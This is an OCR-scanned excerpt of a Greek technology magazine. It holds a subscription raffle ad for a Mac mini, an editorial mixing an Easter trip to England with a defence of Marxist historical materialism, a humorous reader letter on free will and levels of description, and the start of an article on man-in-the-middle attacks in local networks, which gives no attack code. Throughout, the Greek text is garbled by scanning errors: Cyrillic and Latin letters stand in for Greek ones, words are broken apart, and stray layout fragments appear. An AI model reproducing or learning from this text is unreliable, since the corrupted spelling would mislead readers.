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κάθε μήνα. H Parabing Creations έχει την έδρα της στην Καλαμαριά Θεσσαλονίκης. O δικτυακός τόπος του περιοδικού είναι στο 
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Αυτό то Mac mini είναι σχεδιασμένο ώστε να κάνει ότι θέλετε - 
και πολλά περισσότερα. 


Αυτό To Mac mini δεν είναι ro βασικό μοντέλο, και κοστίζει 1129 ευρώ 
(http://store.istorm.gr/mac/mac-mini/2-8ghz-mac-mini.html). 


Αυτό To Mac mini To κληρώνουμε μεταξύ 25 αναγνωστών µε Jumbo- 
Pack Plus (60 τεύχη). 


Αν η συνδρομή σας πλησιάζει στη λήξη της, αυτό το Mac mini εἶναι 
εξαιρετικά πιθανό να γίνει δικό σας. 


fia να πάρετε µέρος στην κλήρωση, αρκεί va πάρετε κι εσείς Jumbo- 
Pack Plus συμπληρώνοντας κατάλληλα τη φόρμα παραγγελίας ото 
http://deltahacker.gr/pdf12order/#s2. 


Από την ἴδια τη φόρμα παραγγελίας βλέπετε πόσους αναγνώστες 
με Jumbo-Pack Plus χρειαζόμαστε ακόµα, WOTE να προχωρήσουμε 
στην κλήρωση. 


Προσέξτε: Αν και θα περιμένουμε όσο χρειαστεί για να έχουµε 25 
συνδρομητές µε Jumbo-Pack Plus και να τους Κκληρώσουµε то Mac 
mini, αυτό δεν σηµαίνει ότι δεν μπορούμε να κάνουμε κάτι για να επι- 
σπεύσουµε τη διαδικασία. Κάντε αυτό που πρέπει, συμπληρώνοντας 
τη φόρμα παραγγελίας: http://deltahacker.gr/pdf12order/#s2 


Καλή σας επιτυχία! 


Νορθ Γιορκ Μουρς. Όχι Ρέι. 


by spiral evOlutTOn 


H Μεγάλη Εβδομάδα ήταν ηλιόλουστη και ζεστή. Μη σας πω κιόλας ότι τη 
Μεγάλη Πέμπτη άρπαξα και λίγο στο πρόσωπο. Μόνο την Κυριακή του Πάσχα 
μας τα χάλασε ο καιρός, µε λίγο ψιλόβροχο που κατά περιόδους µετατρεπό- 
ταν σε χιονόνερο. Μη νομίζετε όµως ότι πτοηθήκαµε. Είχαμε απορρίψει το 
ψήσιμο στη σούβλα προ ηµερών και σχεδιάζαµε va στουμπώσουμε το αρνί σε 
κάποιο φούρνο. 


by spiral ev0lut10n 


Τελικά χρειάστηκαν τρεις φούρνοι, αλλά είμαι σίγουρος ότι δεν είναι ro μέγε- 
θος του αρνιού που σας προβληματίζει αυτή τη στιγµή. Που στο καλό µπορεί va 
έκανε τόσο καλό καιρό κατά τη διάρκεια της Μεγάλης Εβδομάδας, και να κατέ- 
ληξε σε χιονόνερο την Κυριακή του Πάσχα; 


E, λοιπόν, όλα αυτά συνέβησαν στην Αγγλία. Λίγο η εκεί’ παρέα που τους TE- 
λευταίους µήνες επαναλάμβανε την πρόσκληση διαρκώς, λίγο η "εδώ’ παρέα 
που είχε ενθουσιαστεί, οπότε την πήραμε την απόφαση: Περάσαμε τις μέρες 
του Πάσχα στην εξοχή της Αγγλίας και, ката κύριο λόγο, σε µια фарра στο 
Glaisdale, κάπου µέσα στο εθνικὀ πάρκο North York Moors. (Στ.Ε. Το Ρέι είναι 
κοντά апо το Λονδίνο. Άνετα θα μπορούσαν να εἶχαν πεταχτεί αλλά, όοοοοχι, 
North York Moors µου θελαν) 


Φυσικά, αεροπλάνο απὀ Αθήνα για τη фарра oro Glaisdale δεν υπάρχει, έτσι 
αναζητήσαμε µια οικονομική πτήση για Λονδίνο. H εξαιρετικά σύντομη επίσκε- 
pn στην Πρωτεύουσα της Αγγλίας, ήταν το µόνο που µε δυσαρέστησε σ όλο 
το ταξίδι. Βασικά, αν ήταν πραγματική επίσκεψη και όχι µια βιαστική διέλευση, 
ίσως να συναντούσα για λίγο και τον Ανιψιό... 


Για τον Ανιψιό του Θείου Ακάκιου λέω, που µε το που δημοσιεύτηκε η πλέον 
πρόσφατη επιστολή του Θείου είχε σπεύσει να επικοινωνήσει, γεμάτος ανησυ- 
xia: "Τι συμβαίνει µε τον ανκλ; Έχετε παρεξηγηθεί; Προς τι αυτή η αντιπαράθε- 


ση, 


Μάταια προσπάθησα va τον καθησυχάσω, και να TOV πείσω ότι οι σχέσεις µου 
με τον Θείο Ακάκιο δεν διατρέχουν κανέναν κίνδυνο. Αλλά όταν ζει κανείς στο 
εξωτερικό και η μόνη επαφή που έχει µε τους δικούς του εἶναι µέσα апо το 
σκάιπ ή/και µερικές επιστολές, είναι εύκολο va παρεξηγήσει πρόσωπα και KA- 
ταστάσεις. 


Νομίζω όµως ότι θα μπορούσα να πω κι από εδώ δυο λόγια - µε την ελπίδα 
πάντα να καθησυχάσω τον Ανιψιό. Πιστεύω ότιο θείος Ακάκιος παρεξήγησε та 
γραφόμενά µου oro editorial του τεύχους 041 ñ, πιο σωστά, την ἐκφρασή μου. 
Φυσικά, αυτό δεν σημαίνει επ’ ουδενί ότι παρεξηγηθήκαμε. 


ОроЛоүо ότι µπορεί και να έφταιξα. Πολλές φορές ᾿στρογγυλεύω" και απλο- 
пош περισσότερο απ' όσο πρέπει, siTe για οικονομία λόγου είτε από βιασύνη. 
Κάποιες άλλες φορές, για παρόμοιους λόγους, χρησιμοποιώ "uaAALapéc" €K- 
φράσεις όπως, T-X. "п φτωχοποίηση του κόσμου της εργασίας”. Προς υπεράσπι- 
σή µου, av και τέτοιοι όροι δεν είναι δόκιμοι, πρέπει νατονίσω ότιη συντριπτική 
πλειονότητα των κατοίκων αυτής της χώρας µπορεί να τους κατανοήσει πλή- 
ρως. Ειδικά όσοι ανήκουν στον "κόσμο της εργασίας”, αφού ειδικά αυτοί έχουν 
νιώσει τη “φτωχοποίηση' στο πετσί τους. 


Ξέρετε κάτι; Όταν παρουσιάζω την οπτική µου για тїс πολιτικές και οικονοµι- 
κές εξελίξεις, απευθύνομαι ακριβώς σε αυτούς. Δηλαδή στους εργαζόμενους, 
στους σπουδαστές, στους άνεργους και, για να µη µακρηγορώ, σε όσους ζουν 
από τη δουλειάτους. 


Δεν αδιαφορώ για τους υπόλοιπους ανθρώπους, ούτε τους θεωρώ κακόβου- 
λους a priori. Πολύ περισσότερο, δεν θεωρώ κανέναν άνθρωπο ασήμαντο, Ļu- 
χη μαριονέτα, ανίκανο να αναλάβει πρωτοβουλίες και δεν ξέρω κι εγώ τι άλλο. 


Σας διαβεβαιώνω ότι αυτή τη στρεβλή και επικίνδυνη άποψη για тоос ανθρώ- 
πους δεν την έχω. Μπορεί να κάνω άλλα λάθη, αλλά το συγκεκριµένο δεν то 
κάνω ούτε εγώ, ούτε τα Κομμουνιστικά Κόμματα - τουλάχιστον ὀχι όλα. 


Στο κάτω κάτω, αν οι άνθρωποι ήταν άβουλα όντα, δεν θα υπήρχε καμία ελπίδα 
για αλλαγή της κοινωνίας. Επομένως, av τα Κομμουνιστικά Κόμματα πίστευαν 
κάτι τέτοιο για τον άνθρωπο, δεν θα είχαν κανένα λόγο ύπαρξης. Σ' αυτή την 
περίπτωση θα αυτοδιαλύονταν ή, αν εἶχαν τη λογική της "кооталас", θα ενσω- 
ματώνονταν σε άλλους πολιτικούς σχηματισμούς, πιο mainstream kat προσοδο- 


φόρους. 


Το γεγονός ότι στις σημερινές συνθήκες υπάρχουν Κομμουνιστικά Κόμματα 
που δεν αυτοδιαλύονται, ούτε ενσωματώνονται στον "κυρίαρχο ρεαλισμό” on- 
μαίνει ότι θεωρούν δυνατή την αλλαγή της κοινωνίας. Με άλλα λόγια, τα συγκε- 
κριµένα Κόμματα θεωρούν ότι οι άνθρωποι έχουν τη δυνατότητα να αλλάξουν 
την κοινωνία και ара δεν εἶναι άβουλα όντα, ούτε και ασήµαντοι. 


Н αλήθεια εἰναι ότι δεν έχω συνηθίσει να σκέφτομαι µε όρους επιπέδων και 
µετα-επιπέδων. Θέλω να πιστεύω όµως ότι έχω διαβάσει σωστά το Κεφάλαιο. 
Δεν σκοπεύω να το παρουσιάσω και, για va 'μαι ειλικρινής, δεν θα τολμούσα 
κιόλας. Επιτρέψτε µου όµως να σταθώ σε κάτι που θεωρώ σημαντικό. 


O Μαρξ, σε όλη την ανάλυση που πραγματοποιεί στους τρεις τόµους του Ke- 
φαλαίου, χρησιμοποιεί σαν εργαλείο σκέψης τον διαλεκτικό υλισμό και τον 
ιστορικό υλισμό. Στο έργο του δεν στέκεται στις πράξεις του ενός ή του ἀλ- 
AOU προσώπου. Μελετάει την κεφαλαιοκρατική εμπορευματική παραγωγή, τις 
αντίστοιχες σχέσεις παραγωγής και την άµεση επἰδρασή τους στη δομή και στη 
γενικότερη λειτουργία της κοινωνίας. 


Αναρωτιέστε που κολλάει αυτό µε τα προηγούμενα; О Μαρξ δεν έχει σαν αφε- 
τηρία του τη βούληση των ανθρώπων - ro rt κουβαλάει ο καθένας στο κεφάλι 
του και TO TL εύχεται για την κοινωνία. Σύμφωνα µε τον διαλεκτικό υλισμό, βλέ- 
πετε, η κοινωνία εἶναι αυτή που διαμορφώνει τις συνειδήσεις των ανθρώπων 
και ὀχι το αντίθετο. 


Σκεφτείτε то λίγο, αυτό. Το τι θεωρούμε ηθικό και ανήθικο, ro πώς αντιλαμβα- 
vópaore το δίκαιο, την ελευθερία και πάει λέγοντας, καθορίζεται апо τη δομή 
και τον τρόπο λειτουργίας της κοινωνίας στην οποία ζούμε. Σκεφτείτε, για πα- 
ράδειγµα, πόσο διαφορετική ήταν η αντίληψη των ανθρώπων για την ελευθε- 
ρία, για το ρόλο της Εκκλησίας στην καθημερινή ζωή ἡ για το δικαίωµα στη 
μόρφωση, την εποχή της Φεουδαρχίας (π.χ., στην Αγγλία του 1300 αιώνα). 


Αυτή n θεώρηση των πραγμάτων δεν καταδικάζει την ανθρώπινη σκέψη σε KÁ- 
ποια αναπόδραστη φυλακή - αλλά θα εξηγηθω σε λίγο. Πα την ώρα, επιτρέψτε 
μου να πω µια κουβέντα και για τον ιστορικό υλισμό. 


Ποιος καθορίζει, λοιπόν, τη δομή και τον τρόπο λειτουργίας της κοινωνίας; 
Ποιος ρυθμίζει τις κοινωνικές σχέσεις; Σύμφωνα µε τον ιστορικό υλισμό, ανά- 
μεσα σε όλες τις κοινωνικές σχέσεις, καθοριστικές εἰναι οι αντικειμενικές, πα- 
ραγωγικές σχέσεις. Н κοινωνία δεν αποτελεί µια μηχανική ένωση μονάδων, που 
μπορεί να αλλάζει κατά τη βούληση του ενός ή του άλλου. H κοινωνία αποτελεί 
το σύνολο των σχέσεων που αναπτύσσονται ανάμεσα σε ανθρώπους ἡ ολόκλη- 
peç κοινωνικές τάξεις. H κίνηση της κοινωνίας, η εξέλιξή της, καθορίζεται апо 
τις μεταβολές στις οποίες υπόκεινται οι θεμελιώδεις κοινωνικές σχέσεις, δη- 
λαδή οι σχέσεις παραγωγής. Για τους παραπάνω λόγους, στη θέση του πολύ 
γενικού όρου κοινωνία’, o Μαρξ εισήγαγε και χρησιμοποιούσε τον Оро ”κοινωνι- 
κό-οικονομικός σχηματισμός". 


Ας επιστρέψω τώρα στο αρχικό µας θέµα, µε την ελπίδα ότι δεν έγινα (πολύ) 
κουραστικός. Μήπως o διαλεκτικός και ο ιστορικός υλισμός οδηγούν στη θέση 
για την οποία µε κατηγορούσε ο Θείος, στην επιστολή του που δημοσιεύεται O' 
αυτό εδώ το τεύχος; 


Κάθε άλλο! Το γεγονός ότιη συνείδηση των ανθρώπων ακολουθεί’, το γεγονός 
ότι ο τρόπος σκέψης µας καθορίζεται από τον εκάστοτε κοινωνικό-οικονομικό 
σχηματισμό, δεν σημαίνει ότι είμαστε άβουλα όντα. Σημαίνει όµως το εξής: Αν 


/var/ log/messages 

θέλουμε να "αλλάξει η κοινωνία” (το av και σε ποιες τάξεις εἶναι χωρισμένη, το 
πώς σκέφτονται και λειτουργούν οι άνθρωποι κ.λπ.) δεν αρκεί να αλλάξουμε µυα- 
Ла. Πρέπει να αλλάξουν "και οι σχέσεις παραγωγής. 


Εν ολίγοις, για να αλλάξει ο κόσμος δεν αρκούν οι ευχές, ούτε οι µικρές, καθη- 
μερινές καλές πράξεις (ΣΤΕ. Μάλλον αναφέρεται στις "δράσεις" του στιλ ξεκολ- 
Ларе τσἰχλες апо πεζοδρόμια ή ντύνουµε τους κορμούς των δέντρων µε κασκόλ 
- αλλά µπορεί και να κάνω λάθος :Р) Αυτό που χρειάζεται είναι αλλαγή στη βάση 
της κοινωνίας, δηλαδή στις σχέσεις παραγωγής. 


Κάτι τέτοιο δεν µπορεί να γίνει ήσυχα ήσυχα, µε τον κόσµο στον καναπέ του και 
με την αποκλειστική δράση µιας κάποιας κυβέρνησης, την οποία έχουµε διορίσει 
για να µας λύσει τα προβλήματα. Πολύ περισσότερο, µια τέτοια αλλαγή εἶναι αδύ- 
varo να συμβεί από µια κυβέρνηση που δίνει μάχη για την υπεράσπιση rou κυρίαρ- 
хоо τρόπου παραγωγής, και ара των σχέσεων παραγωγής που επικρατούν ήδη. 


Κάπως έτσι, το τι αποφασίζουν και το τι κάνουν τα στελέχη της σημερινής κυ- 
βέρνησης, είναι αδιάφορο σε σχέση µε το αν θα αλλάξει η δοµή και η λειτουργία 
της ελληνικής κοινωνίας. Δεν θα το χαρακτήριζα όµως συνολικά αδιάφορο. Πα 
παράδειγµα, η αύξηση της φορολογίας θα έκανε τη ζωή όλων δυσκολότερη, ενώ 
η κατάργηση των διοδίων θα προκαλούσε ανακούφιση σε κάθε εργαζόμενο. Па то 
πρώτο δεν μπορώ va πω τίποτα περισσότερο από κάποιες εκτιμήσεις. Πα το δεύ- 
τερο, μπορώ να σας πω ότι η κυβέρνησή µας το έχει απορρίψει ασυζητητί. 


Την προσοχή σας! Το γεγονός ότι η αλλαγή της κοινωνίας δεν µπορεί να επιτευ- 
χθεί µε την αλλαγή της καθημερινής πρακτικής рас, δεν αποτελεί δικαιολογία 
για να µην αλλάζουμε και να µη διορθώνουµε τίποτα σε προσωπικό ή εταιρικό 
επίπεδο. Ακριβώς γι αυτό, ο Προκομμένος Μας (TM) µε το Επιτελείο του Βορρά 
διαρκώς σκέφτονται πώς μπορούν να βελτιώνουν και να εμπλουτίζουν TO περιε- 
χόμενο που παράγουµε. Θα δείτε, για παράδειγµα, ότι από το τεύχος 042 ro layout 
του PDF έχει επανασχεδιαστεί και τώρα είναι περισσότερο print-friendly. (Πολλοί 
αναγνώστες µας ζητούσαν κάτι τέτοιο — κι ευτυχώς που η διεύθυνση εδέησε!) 
Από το τεύχος 041, εξάλλου, τα άρθρα του περιοδικού δημοσιεύονται «και” online 
(πρόσβαση έχουν μόνον οι αναγνώστες µε ενεργή συνδρομή στο περιοδικό). Ma- 
θαίνω επίσης ότι επανέρχονται τα deltaCast (video tutorials), τα οποία είχαν μπει 
στον πάγο για λόγους "εξωσχολικούς' που δεν µου επιτρέπεται ν' αποκαλύψω. 
Έχει κι άλλα καινούργια: βλέπω, π.χ., ότι στο site άρχισαν у ανεβαίνουν ειδήσεις. 
(M' αρέσει το αυστηρό και µεστό ύφος, αλλά και οι δόσεις χιούμορ εδώ κι εκεί.) 
Ακούω, τέλος, για κάτι ολιγόλεπτα video tips που έρχονται και μάλιστα θα δηµοσι- 
εὐονται συχνά — τουλάχιστον μία φορά τη βδομάδα. Μεταξύ pac, va то δω Kat va 
µην TO πιστεύω αυτό :Р 
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Αγαπητοί µου, 

Έχω ανοίξεν μπροστά роо τη γραφομηχανή και έχω σκοπό να ολολληρώς 
την επιστολή µου µέσα στο ερχόμενο δίωρο. Είμαι αποφασισμένος. 

Σπανίως µου δίνεται η ευκαιρία το τελευτ (o διάστηµα να έχω όλο το 
σπίτι εντελώς στη διάθεσή µου. Πάντα κάπθιος εἴναν κάπου καν κάτν κάνει. 


Χτες, ας πούμε, ήταν όλον στην κουζίνα, καν όλη μέρα φτιάχνανε κοτό- 
πονλο τζαλφρέζν. 

Σήµερα, ενκοστή πέμπτη του μηνού, μον δίνεταν μνα μοναδική ευκαιρία. 
Όλοι έχουν φύγει από νωρίς καν έχουν κατέβεν στο Σύνταγμα για να πα- 
ρακολουθήσουν την παρέλαση καν να δουν από κοντά πώς θα εορτάζονται, 
πλέον, στη µετά μνημόννον εποχή, ον εθνικές επέτειον. 

Με έῴηναν xv εμένα να κατέβω, αλλά δεν µάσησα. Tv µου υποσχέθηκαν δεν 
λέγεται: λανκό γλέντι µε παραδοσιακές φορεσιές καν χορούς. Νηστίσιµες 
λιχουδιές απὀ τα ακριτικά χωριά. Στιγμές συλλογνσμού καν εθνικής ανάτα- 
σης. Αναβνώσεις αρχαίων ηθών και εθίµων του λαού µας. Και πάει λέγοντας. 

Δελεαστικό, δεν λέω, αλλά σαν το κοτόπουλο τζαλφρέζι δεν. 

Хора, που алб το πρωί βρέχει. 

Τους πήγα λοιπόν μέχρι την πόρτα µε το χαμόγελο στα χείλη. Н πατρική 
συγκατάβαση και συµπάθενα εναλλάσσονταν στο πρόσωπό µου µε την άγρια 
χαρά μπρος στη συνειδητοποίηση ότι επιτέλους θα έµενα μόνος. 

Μόνος, µε τα απαραίτητα: Γραφομηχανῆ. WD40. Χαρτί. Καφές. Μπισκότα 
µε μαύρη σοκολάτα. Φάκελος A5. Γραμματόσημα. 

Λοιπόν, δεν καθυστερώ άλλο, στο προκείµενο. 

Θέλω να επανέλθω σε ένα θέμα για το οποίο έχω μιλῆσεν καν ξαναμιλήσεν 
απὀ τις σελίδες αυτές. 

θα πίστευα πως το θέµα έχεν πλέον εξαντληθεί αλλά ὀχν. Δεν έχει. Όπου 
καν να στραφώ, μπροστά µου το βλέπω. 

Πρόκειται για το θέµα της παράβλεφης της διαφοράς μεταξύ περιγραφι- 
XV καν οντολογικών αποφάνσεων ἡ του τετριμμένου της διάκρισης μεταξύ 
Επιπέδων καν µετα-επιπέδων αναφοράς. 

θα θυμάστε, ίσως. Αυτά τα είχα πρωτογράφει πριν καιρό (επιστολές #022 
καν #025), καν τα ανέπτνξα περαιτέρω καν πιο πρόσφατα στη συζήτηση περί 
τζν τζυ καν τζιντζινκνών. 

To θέµα ωστόσο παραμένει ανεξάντλητο ἡ έστω μη-εξαντλήσιμο. Σίγουρα 
πάντως επίκαιρο. 

Σας λέω, το βλέπω συνεχώς μπροστά. µου. 

Να, yla παράδειγµα, έβλεπα χτες στο Γιοντιουµπ ένα παλιότερο βιντεάκι 
(https://www.youtube.com/watch*v ShD tCdfYSk) του New Scientist 
για τα "κρυμμένα επίπεδα της πραγματικότητας". Πολύ ενδιαφέρον, µε όλα 
του τα καλούδια, γνα την επιστήμη, την αντικειμενική πραγματικότητα, τη 
σχετικότητα, την κβαντική διεμπλοκή καν πάει λέγοντας, thank you very 
much. 


Σνέιλ μέιλ 


Μέχρν πον αρχίζει σε κάπονα στιγμή να µιλάεν για την αρχή της απροσδιοριστίας, για то ηλε- 
χτρόννο, καν το ότι δεν ξέρουμε πού βρίσκεται, κ.λπ. κ.λπ., μέχρν να μετρήσουμε, κ.λπ. κ.λπ. 


"Αν όμως εγκαταλείφουµε την ιδέα", λέει σε κάποια φάση ο παρουσιαστής, "πως είναν στο χέρν 
μας να αποφασίσουµε πότε καν πώς μετράμε, μήπως βγαίνει το συμπέρασμα πως ἴσως ήταν προ- 
διαγεγραμμένο να βρεθεί το σωματίδιο εκεί όπου το βρήκαμε» Αὐτό βέβαια θα σήμαυνε πως δεν 
υπάρχεν τίποτα θεμελνωδώς τυχαίο σε αυτό που ονομάζουμε πραγματικότητα. Όμως θα σήμαινε 
επίσης ότι δεν υπάρχεν ελεύθερη βούληση. θα ήμασταν αναγκασμένοι να δεχτούμε πως η ελευθερία 
µας να επιλέξουμε το ένα ἡ το άλλο δεν είναν παρά pia φευδαίσθηση, καν бте η συνείδηση δεν εί- 
ναν παρά ένα πάρεργο των χημικών αντιδράσεων που λαμβάνουν χώρα στον εγκέφαλό µας και που 
είναν απολύτως προβλέφιμες." 


Να τα μααας... 


Ен, τά 'λεγα 'γὠ, ёра. κάθονταν καν γράφουν για πράγματα που δεν ξέρουν κάποια στιγµή θα 
την πούνε τη μπαρούφα τους. 


Пора, εἶναι η μπαρούφας 


Ma, ποια άλλη από το ότι μπερδεύουν τον φάντη µε το ρετσινόλαδο; Tv σχέση έχει το ερώτημα 
περί ελεύθερης βούλησης στις ανθρώπινες πράξεις, µε το ερώτημα үка. το αν υπάρχει τυχαιότητα 
στο ερμηνευτικό επίπεδο της κβαντομηχανικής; Καμία. Δεν έχει καμία σχέση. 

Н ελευθερία που έχουν (ἡ δεν έχουν) ον άνθρωπον είναι κάτι που βρίσκεται σε εντελώς διαφο- 
ρετικό επίπεδο απὀ εκείνο της ελευθερίας που έχουν (ή δεν έχουν) τα στοιχειώδη σωματίδια. To 
буора. μόνο μοιάζει YL αυτό και μπερδευόμαστε. Πρόκενται για επίπεδα µε εντελώς διαφορετικά. 
πεδία αναφοράς, απολύτως ur αναγώγνµα το ένα στο άλλο. 


Άλλη ελευθερία η µία, άλλη η άλλη. 

Αμάν πια. 

θα µου πείτε, OK, κάπονος μπερδεύτηκε, είπε µια μπαρούφα. Εντάξεν, δεν έγινε καν τίποτα. 
θα διαφωνήσω. To πράγμα δεν εἶναι τόσο αθώο 600 φαίνεται. 


Ας πάρουμε τις συζητήσεις για την οικονομική κρίση και την κατάσταση στην Ελλάδα. Ας πά- 
povge, συγκεκρυμένα, τις αναλύσεις που γίνονταν алб αριστερή σκοπιά. Αυτές, δηλαδή, που θεω- 
ρούν πως όλα όσα συμβαίνουν έχουν πάτι να κάνουν (καν) µε τις εσωτερικές επιλογές του μεγά- 
λον κεφαλαίου ἡ τις εγγενείς εσωτερικές αντιφάσεις TOU παπιταλισμού. 


θα γίνω συγκεκρυμένοςο. Παίρνω ένα παράδειγµα πρόσφατο --από τις σελίδες του ίδιου αυτού 
του περιοδικού πον "κρατάτε" στο τάμπλετ σας. Στο εντιτόριαλ του περασμένου τεύχους διαβάζω 
τα εξής: 

" H πυβέρνηση και τα στελέχη της µμετέτρεφαν το αποτέλεσµα σε αίτνο. Πήραν ένα από τα 
συμπτώματα της καπιταλιστικής ουκονομµικής κρίσης, τη διαρκή καν εντεινόµενη φτωχοποίηση του 
κόσμον της εργασίας, και το παρουσίασαν σαν αφετηρνακή αντία των προβλημάτων. ... Σας 
κάνει εντύπωση που προσπαθούν να παρουσιάσουν την κρίση σαν αποτέλεσµα κακῆς τύχης καν 
πακής διαχείρισης xv ὀχι σαν εγγενές χαρακτη- 

Ρριστικό του καπιταλιστικού 


ασ чт 
τρόπου παραγωγής; ... ї " qe meu» Y 
Σημασία έχεν ότι τα κνβερ- Αν 
νητυκά στελέχη στηρίζουν καν 
αυτοί ένα ονπκονομυκό σύστημα | 


που οδηγεί «αναπόφευκτα στη \ 
φτώχεια ολόκληρα εκατομμύρια 


- 
ανθρώπων." ' 

θα µου πείτε, τν πρόβλημα 
έχω µε το σχόλιο αυτό; H συµ- 
φωνώ ἡ διαφωνώ. Τι άλλο να πεν 4 
κανείς. 

Λοιπόν, ὀχν. Δεν είναν τόσο 
απλό. 


To πρόβλημα δεν είναν αν 
τα εγγενή χαρακτηριστικά του 
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σνένλ. μένλ 


VHAGKER 


καπιταλιστικού τρόπου παραγωγής οδηγούν *avaxópeuxTa στη φτώχεια, 
όπως ισχυρίζεται το κείμενο. Επ' αυτού μπορούμε να συζητάμε καν να δια- 
φωνούμε κατά το δονούν. 


To πρόβλημα που εντοπίζω είναν πιο ύπουλο. Πρόκενταν βέβανα yra τη 
διαφαινόμενη σύγχυση των πεδίων αναφοράς των όρων που χρησιμοποιού- 
утау στο συλλογισμό. 

То βασικό επιχείρημα στο παραπάνω είναν πως, εφόσον o καπιταλιστικός 
τρόπος παραγωγής κάνεν το τούτο ἡ το άλλο, τότε είναν αδιάφορο το τι 
αποφασίζουν και τν κάνουν τα στελέχη της μίας ἡ της ἄλλης κυβέρνησης: 
κάθε τους απόφαση και κάθε τους πράξη θα καταλήγει να αποτελεί στήριξη 
"της διαρκούς καν εντεινόµενης φτωχοποίησης τον κόσμον της εργασίας" 
(whatever that is). 


To λάθος, λοιπόν, του συλλογνσμού --λέω εγώ-- έγκενταν στο бту απο- 
σιωπάται (ἡ περνά απαρατήρητο) πως άλλο πράγμα είναι το επίπεδο στο 
οποίο δρουν τα υποκείμενα ενός οικονομικού συστήµατος (καπιταλιστικού 
ή άλλον) καν άλλο, εντελώς διαφορετικό, το επίπεδο στο οποίο αποκτά νό- 
тра. рио. συζήτηση περί κυρίαρχων τρόπων παραγωγής καν των συμπτωμάτων 
τους. 

To πρώτο εἶναι ένα επίπεδο που περιλαμβάνει ανθρώπινα ενεργήµατα: 
Περιλαμβάνει αποφάσεις, διλήμματα, συζητήσεις, συγκρούσεις, απειλές, 
αντνπαλότητες, ανταλλαγές καν πάεν λέγοντας. 

To δεύτερο είναν µετα-επίπεδο του πρώτου. Περιλαμβάνει αφανρέσεις, 
μοντέλα, XAL έννονες όπως "τρόπος παραγωγής", "εργατική τάξη", "κεφά- 
λανο", "υπεραξία", "πτωτική τάση του ποσοστού κέρδους" KU. κ.λπ. 

Όταν μίλησε ο Μαρξ για τον καπιταλιστικὀ τρόπο παραγωγής, αυτό που 
έκανε ήταν το εξής: χρησιμοποίησε µια σειρά απὀ τέτονες αφηρημένες έν- 
νονες, και σχημάτισε ένα περιγραφικὀ μοντέλο της εσωτερικής λογικής των 
µυρνάδων μυρνάδων οικονοµικών συμβάντων που ελάμβαναν χώρα δίπλα του. 
Στόχος του είναν να καταδείξει κάτι. 

Στον Μαρξ ήταν σαφές πως όταν μιλάμε για "καπιταλιστικό τρόπο παρα- 
γωγής" δεν μιλάμε γνα шоу οντότητα του κόσμου τούτου που δρα οινκονοµι- 
κά, όπως µια πολυεθνική ἡ ένα καρτέλ. Κάνουμε µια περιγραφή των ονκονο- 
μυκών δράσεων στις οποίες συμμετέχεν ша, πολυεθνική ή ένα καρτέλ. 

Είναι σφάλμα να μιλάμε ταυτόχρονα για τα πράγματα нох τις περιγραφές 
τους. O Μαρξ δεν το έκανε αυτό το σφάλμα. Τα κομμουνιστικά. κόμματα συ- 
νήθως το κάνουν. 

Μια άµεση παρενέργενα του συγκεκρνµένου σφάλματος είναν η πεποίθηση 
πως εφόσον γνωρίζουμε (εμείς, δηλαδή το κόμμα) τους νόμους της οικονο- 
μίας, τότε ον επυµέρους επιλογές των ανθρώπων παύουν να έχουν σημασία. 
Στο τέλος καταλήγουμε στο ÓTL ον ἴδιον ον άνθρωπον δεν έχουν σημασία. 

Μέγα σφάλμα, συγχωράτε µε. 

Αντίστουχο µε TO να λέω πως η εξάλενφη της τυχαιότητας ало την κβα- 
ντιχή μηχανική οδηγεί στο συμπέρασμα πως δεν υπάρχει ανθρώπινη βούληση. 

Αντίστονχο αλλά πιο επικίνδυνο. 

Αυτάααα. 


Με χαρά pou βλέπω πως έχει βγάλεν λίγο ήλιο. Αυτό σημαίνει πως θα αρ- 
γήσουν Ἀν άλλο να επιστρέφουν. 


Β ρε γλέντια. 


Σας ασπάζομαν, 
θείος Ακάκνος 


ῶἼθεις тоату ασφαλής; 
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Εν γένει επισφαλή 


by pzFerret [Project Zero] 


Πολλές φορές θεωρούμε ότι ο μόνος κίνδυνος που απειλεί τους υπολογιστές 
μας εἶναι κάποιος "χάκερ" στην άλλη άκρη της γης - ñ τουλάχιστον αρκετά 
μακριά µας. Έτσι, όταν κάποιος θίγει το ζήτημα της δικτυακής ασφάλειας, τα 
πρώτα πράγματα που σκεφτόμαστε εἰναι o router που χωρίζει το τοπικό µας 
δίκτυο апо το Internet, το firewall που έχουμε ενεργοποιήσει και, βεβαίως, το αν 
είναι καλά ρυθµισμένο. 


Μπορεί ο ηθικός αυτουργός να εἰναι οι ταινίες που βλέπαμε πιτσιρικάδες ἡ akó- 
μα και η φτηνή δημοσιογραφία, που πασχίζει να πουλήσει ιστορίες για τιτανο-κα- 
κοποιούς χάκερ. Όπως όµως και va χουν τα πράγµατα, εδώ υπάρχει éva λάθος 
που εἶναι όλο δικό µας: Εξετάζουµε τη δικτυακή ασφάλεια ενός συστήµατος και, 
εντελώς ασυναίσθητα, εστιάζουµε στις απειλές που μπορούν να προέλθουν απὀ 
το Internet, παραβλέποντας το τοπικό δίκτυο και τους κινδύνους που ενδεχομένως 
κρύβει. Ωστόσο, όπως γνωρίζουν οι τακτικοί αναγνώστες του περιοδικού, οι επιθέ- 
σεις εντός των τοπικών δικτύων πραγματοποιούνται σχετικά εύκολα κι όταν επι- 
τυγχάνουν έχουν ολέθριες συνέπειες. Πολλές απὀ τις επιθέσεις του είδους είναι 
γνωστές προ πολλού. Παραμένουν όµως πάντα επίκαιρες, καθώς η ρίζα тоос εντο- 
πίζεται σε εγγενείς αδυναμίες που έχουν συγκεκριµένα δικτυακά πρωτόκολλα επι- 
κοινωνίας. Και un νομίζετε, δηλαδή, ότι μιλάμε για τις αδυναμίες ενός ξεχασµένου 
συστήµατος, που έχει va δεχτεί αναβαθμίσεις από την εποχή του Νώε. 


Οι επιθέσεις -συνήθως της κατηγορίας Man in The Middle- που εξαπολύονται στα 
τοπικά δίκτυα, παρέχουν τη δυνατότητα στον επιτιθέµενο v' αποκτά χρήσιμες πλη- 
ροφορίες για τις ὁραστηριότητες του θύματος, έως και κωδικούς πρόσβασης σε 
διάφορες υπηρεσίες. Όπως καταλαβαίνετε, αν πρόκειται για то τοπικό δίκτυο µιας 
εταιρείας ή κάποιου μεγάλου οργανισμού, η διαρροή ενός συνθηµατικού αποτελεί 
σοβαρό ζήτημα. Βλέπετε, στους περισσότερους χώρους δουλειάς δεν εφαρµόζεται 
κάποιο password policy, ενώ, ακόµα κι αν υπάρχει, η τήρησή του επαφίεται συνήθως 
στον πατριωτισμό των χρηστών. Με λίγα λόγια, εἶναι πολύ πιθανόν οι χρήστες του 
